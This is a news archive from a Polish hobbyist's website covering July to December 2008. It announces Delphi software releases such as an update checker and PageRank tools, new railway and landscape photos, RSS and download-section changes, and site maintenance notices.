Pojawił się DUCH sobota, 19 lipca 2008 | DUCH, czyli Dżyszla Update Checker to program, dzięki któremu użytkownicy innych programów stworzonych przeze mnie, a które zostały zainstalowane na komputerze, będą mogli w prosty sposób dokonywać sprawdzenia, czy na serwerze nie są dostępne aktualizacje. Program w wersji alfa wyłącznie informuje o aktualizacjach.
|
Królewski Park w Pszczynie z Żubrami niedziela, 20 lipca 2008 | Wakacje trwają, więc dziś na stronie kolejna garść zdjęć pochodzących tym razem z Pszczyny, która słynie nie tylko z pięknego Zamku, lecz także z zagrody żubrów. W związku z dodaniem nowych zdjęć zmienił się nieco układ galerii - doszedł m.in. nowy dział Rośliny. Zachęcam do zapoznania się z najnowszymi zdjęciami na stronie!
|
Nowszy PageRank dla Delphi wtorek, 22 lipca 2008 | W niecały miesiąc po publikacji jest już kolejna wersja modułu PageRank dla Delphi, która wnosi zmiany zapewniające jeszcze bardziej pewną i jednocześnie elastyczną pracę.
|
Zmiany w kanałach RSS czwartek, 24 lipca 2008 | Z dniem dzisiejszym zmianie ulegają adresy wszystkich informacji dostarczanych drogą RSS. Do ich publikacji przeznaczona została osobna domena - rss.dzyszla.pl. Nazwy plików nie zmieniły się, tak więc format http://*.dzyszla.pl/rss/(Nazwa_pliku).xml ze wszystkich subdomen zmienia się na http://rss.dzyszla.pl/(Nazwa_pliku).xml . Wyjątek dotyczy Dekodera Elektronika, dla którego informacje o nowością będą obecnie znajdować się pod adresem rss.dzyszla.pl/dekoder.xml. Za utrudnienia związane z przeniesieniem przepraszam. Jednocześnie większość dotychczasowych adresów zakładek RSS będzie automatycznie przekierowywać na nowy adres. Wszystkie adresy publikowanych informacji za pośrednictwem RSS (a w zasadzie standardu Atom) dostępne są w Centrum RSS. UWAGA! Przez dzień dzisiejszy serwer rss.dzyszla.pl może być jeszcze nierozpoznawany - wynika to z faktu propagacji adresu w serwerach DNS.
|
I znów transfer sobota, 26 lipca 2008 | W związku z bardzo dużym obciążeniem strony w miesiącu lipcu istnieje duże prawdopodobieństwo, że strona do końca miesiąca zostanie całkowicie wyłączona. Stało się to głównie za sprawą publikacji jednego filmu, do którego link znalazł się w Wikipedii przyciągając w ten sposób dużą liczbę odwiedzających, którzy wygenerowali spory ruch. Za utrudnienia przepraszam.
|
Nowości po przerwie piątek, 1 sierpnia 2008 | Po kilkudniowej przerwie w działaniu strony spowodowanej dużym obciążeniem, dziś wysyp nowości. Pierwszą z nich jest zbiór kilku zdjęć ze stacji Wrocław Główny oraz kilku innych w galerii kolejowej. Wśród programów nowości są trzy. Po pierwsze pojawiła się nowa wersja aplikacji DUCH przeznaczonej do aktualizacji oprogramowania, która została wzbogacona o kolejne informacje oraz konfigurację programu. Pojawił się też zupełnie nowy program w wersji demonstracyjnej - Sitemap PR Creator służący do generowania arkuszy w formacie Excel zawierających mapę stron zadanego serwisu oraz wartości PageRank dla wszystkich jego podstron. Na koniec związane z tym programem plik dla Delphi PageRank Helper został uaktualniony do kolejnej wersji. Myślę, że przerwa w działaniu zostanie zrekompensowana powyższymi nowościami, a w kolejce czekają już kolejne.
Aktualizacja - na stronie pojawiły się też zdjęcia z zaćmienia słońca widziane z miejscowości Żory w dziale Zjawiska i krajobrazy.
|
Planowe czasowe zamknięcie działu Download sobota, 9 sierpnia 2008 | W związku z wyraźnie kształtującymi się wynikami ostatniej ankiety informuję, że w poniedziałek 11 sierpnia br. w godzinach od 10.00-15.00 nastąpi zamknięcie działu Download celem jego modernizacji i przystosowania do nowej funkcjonalności. W tym czasie pliki będą cały czas dostępne i nie nastąpią zakłócenia w pobieraniu, jednakże nie będzie możliwości przeglądania zasobów działu. Za utrudnienia przepraszam. Jednocześnie zastrzegam, iż podany czas niedostępności może ulec zmianie.
|
Pozor, vlak! niedziela, 10 sierpnia 2008 | ...czyli "uwaga, pociąg!" w języku słowackim. Dziś na stronie garść zdjęć głównie pociągów i stacji ze Słowacji z okolic miejscowości Čadca oraz występujących po drodze do przejścia granicznego w Zwardoniu. Zdjęcia lokomotyw znalazły się w dziale Pozostały tabor, zaś zdjęcia stacji utworzyły nowe pozycje w obrębie działu Stacje/obiekty. Zachęcam do przeglądania wszystkich najnowszych zdjęć na stronie!
|
Nowa odsłona Downloadu poniedziałek, 11 sierpnia 2008 | Zgodnie z życzeniem wyrażonym w ankiecie przeprowadzonej na stronie, dziś o godzinie 15:00 dział Download zgodnie z planem został po modernizacji ponownie udostępniony. Nowa wersja umożliwia teraz pobieranie także starszych dostępnych wersji programów. W tym celu należy wejść w szczegóły danego zasobu, a następnie kliknąć na link Pokaż wszystkie dostępne wersje. Jeśli dany zasób posiada starsze wersje - zostaną one wyświetlone w kolejnych kolumnach. Ponadto przy okazji możliwe będzie śledzenie ilości pobrań każdej z wersji z osobna a także niezależnego oceniania każdej z wersji (aby oceniać starsze wersje, należy wcześniej aktywować stosowne "gwiazdki"). W dalszym ciągu w głównym zestawieniu oceny oraz liczna ogólnej ilości pobrań dotyczy danych historycznych i zawiera także dane, które odnoszą się do niedostępnych w serwisie wersji zasobów. W związku z tą modernizacją jeśli ktoś posiada starszą wersję któregoś z zasobów i uważa, że powinna ona być dostępna - proszę o poinformowanie mnie o tym! Zachęcam także gorąco do wyrażania swoich opinii na temat nowej funkcjonalności działu Download w komentarzu do tego newsa!
|
Ten serwis istnieje dzięki Wam! środa, 13 sierpnia 2008 | Dziś na stronach serwisu pojawiła się publicznie dostępna lista osób, które dokonały dobrowolnie darowizny na rzecz strony lub postanowiły wynagrodzić pracę wkładaną w dostępne za darmo programy lub teksty. Pragnę jednocześnie gorąco podziękować im wszystkim! Myślę, że taka "ściana cegiełek" będzie choć małym widocznym dowodem wdzięczności. Jednocześnie strona ta pełni listę osób, które mają prawo do używania specjalnych wersji programów (np. z wyświetlonym w programie ich imieniem). Spis oczywiście nie zawiera ani adresów e-mail (po których można dokonywać przeszukiwania), ani kwot darowizn. Są one przedstawione wyłącznie w ujęciu statystycznym nie dającym się powiązać z daną osobą. Jeśli ktoś ma pomysł na rozwinięcie tej strony (może miejsce na małą grafikę lub link?) niech pisze w komentarzu! Dziękuję raz jeszcze wszystkim wymienionym osobom! Jeśli kogoś pominąłem - proszę o kontakt.
|
Znów coś dla Delphiarzy wtorek, 26 sierpnia 2008 | Idąc za ciosem, po poradzie dotyczącej tworzenia komponentów, na które można przeciągnąć pliki dziś na stronie pojawiło się gotowe rozwiązanie dla tych, którzy wykorzystują bardzo często tą opcję - zbiór komponentów standardowych, na które można przeciągnąć pliki. Dostępne są pełne kody źródłowe dla nowych komponentów oraz przykład ich zastosowania.
|
Przejście na PHP5 środa, 27 sierpnia 2008 | W związku z planowanym na 1 września przejściem serwisu na standard PHP5 informuję, że mogą występować w pierwszym tygodniu września przejściowe problemy z działaniem strony. Wszelkie niezgodności, o ile takie wystąpią, będą systematycznie korygowane. Jednocześnie nowy standard pozwoli na tworzenie bardziej funkcjonalnego i wydajniejszego kodu. Dlatego począwszy od drugiego tygodnia września będą trwały prace mające na celu przyspieszenie działania serwisu oraz zwiększenie jego funkcjonalności. Za wszelkie utrudnienia, jakie z tych przyczyn powstaną - przepraszam.
|
Elektrownia Łaziska poniedziałek, 1 września 2008 | Dziś na stronie pojawiło się kilka zdjęć Elektrowni Łaziska wykonanej od jej tylnej strony. Dodatkowo zdjęcia spod chłodni kominowych! :) Takiego basenu pozazdrości niejedna gmina ;) Sprawdźcie sami!
|
Myśl dnia, czyli subiektywny zbiór sentencji wtorek, 2 września 2008 | Od dziś na stronie każdego dnia prezentowana jest sentencja, myśl, która będzie towarzyszyć przez cały dzień. Można odnaleźć ją w lewym panelu na końcu (pod wszystkimi pozostałymi elementami, gdzie dotychczas prezentowana była "wartość strony"). Wybór przedstawianych myśli jest jak najbardziej subiektywny i oddający własne nastawienie. Jednocześnie nowy element będzie stanowił prosty kalendarz wraz z imieninami. Przy okazji informuję, iż pojawiła się nowa wersja programu Sitemap PR Creator, w której podniesiono limit wersji DEMO!
|
Plagiaty (nieaktualne!) czwartek, 11 września 2008 | Na Forum powstał właśnie nowy dział Plagiaty, w którym będzie można podać adres strony, która nielegalnie wykorzystuje teksty zamieszczone w tym serwisie. Bądźmy uczciwi i uczciwości uczmy! A uczciwych odwiedzających proszę o pomoc w zwalczaniu tego niepokojącego zjawiska bezpardonowego kopiowania treści. |
Odnowienie porady o łączeniu filmów piątek, 12 września 2008 | Najpopularniejsza w serwisie porada dotycząca łączenia filmów w VirtualDub przeszła dziś małą odnowę i zmianę. Przede wszystkim opisano inny sposób na łączenie napisów. Znalazły się także uwagi co do możliwości nowszych wersji programu VirtualDub.
|
Kłopoty z galerią i kanałamia RSS czwartek, 2 października 2008 | Z powodów zmian na serwerach, które wywołały nieoczekiwane efekty przez cały dzień wczorajszy i dzisiejszy niedostępna była opcja przeglądania zdjęć z galerii. Obecnie w ograniczonym trybie będą działać kanały RSS dotyczące Galerii oraz działu Download. Za utrudnienia przepraszam. Trwają rozmowy zarówno z administratorem serwera jak i twórcami oprogramowania w celu ustalenia przyczyny. Jednocześnie zapowiadane prace związane z optymalizacją działania serwera, które były zapowiadane od września, zostają niestety wstrzymane (błąd związany jest właśnie z nową funkcjonalnością).
|
Spokojnych i Miłych Świąt! poniedziałek, 22 grudnia 2008 |
|
| |